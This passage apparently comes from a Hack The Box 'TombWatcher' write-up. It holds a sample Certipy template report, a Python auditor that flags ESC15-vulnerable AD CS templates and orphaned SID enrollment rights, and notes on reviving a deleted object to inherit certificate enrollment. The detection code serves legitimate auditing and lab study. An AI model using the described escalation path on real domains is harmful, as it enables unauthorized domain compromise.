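TOMBWATCHER.HTB\cert_admin
18
Template Name : StaleTemplate
Enabled : True
Enrollee Supplies Subject : True
Requires Manager Approval : False
Authorized Signatures Required : 0
Schema Version : 1
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
19
Template Name : Workstation
Enabled : True
Enrollee Supplies Subject : False
Requires Manager Approval : False
Authorized Signatures Required : 0
Schema Version : 2
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Users
"""


def parse_templates(report):
    """Return {template_name: {field: [values]}}; lines without ' :' continue
    the previous multi-valued field (extra principals under Enrollment Rights)."""
    templates, current, last_key = {}, None, None
    for raw in report.splitlines():
        line = raw.strip()
        if not line or line.isdigit() or line in SECTION_HEADERS:
            last_key = None          # block number or section header: reset continuation
            continue
        if " :" in line:
            key, _, value = (part.strip() for part in line.partition(" :"))
            if key == "Template Name":
                current = templates.setdefault(value, {})
            if current is not None:
                current[key] = [value] if value else []
                last_key = key
        elif current is not None and last_key is not None:
            current[last_key].append(line)
    return templates


def _is_true(template, key):
    return template.get(key, [""])[0] == "True"


def audit_templates(templates, privileged=PRIVILEGED):
    """Findings as (template, code, principal). 'ESC15' = schema 1 + enrollee
    supplies subject + no approval/signatures + non-admin enroller;
    'orphaned-enrollment-ACE' = enroll right granted to an unresolved SID."""
    findings = []
    for name, t in templates.items():
        esc15_shape = (_is_true(t, "Enabled") and _is_true(t, "Enrollee Supplies Subject")
                       and t.get("Schema Version", [""])[0] == "1"
                       and not _is_true(t, "Requires Manager Approval")
                       and t.get("Authorized Signatures Required", ["0"])[0] == "0")
        for principal in t.get("Enrollment Rights", []):
            account = principal.split("\\", 1)[-1]
            if account in privileged:
                continue
            if SID_RE.match(principal):
                findings.append((name, "orphaned-enrollment-ACE", principal))
            elif esc15_shape:
                findings.append((name, "ESC15", principal))
    return findings


if __name__ == "__main__":
    for finding in audit_templates(parse_templates(SAMPLE_REPORT)):
        print(finding)
```

Run against the saved text file from `certipy-ad find` (the Certipy JSON would be the more robust input, but only the text layout is shown here). The orphaned-ACE finding is the one this box turns on: an unresolved SID in a template ACL is dormant, not gone, and anyone who can restore the tombstoned object, as john could through GenericAll on the ADCS OU, inherits the right. The ESC15 finding only translates into the CVE-2024-49019 abuse above on an unpatched CA, as the Certipy remark states.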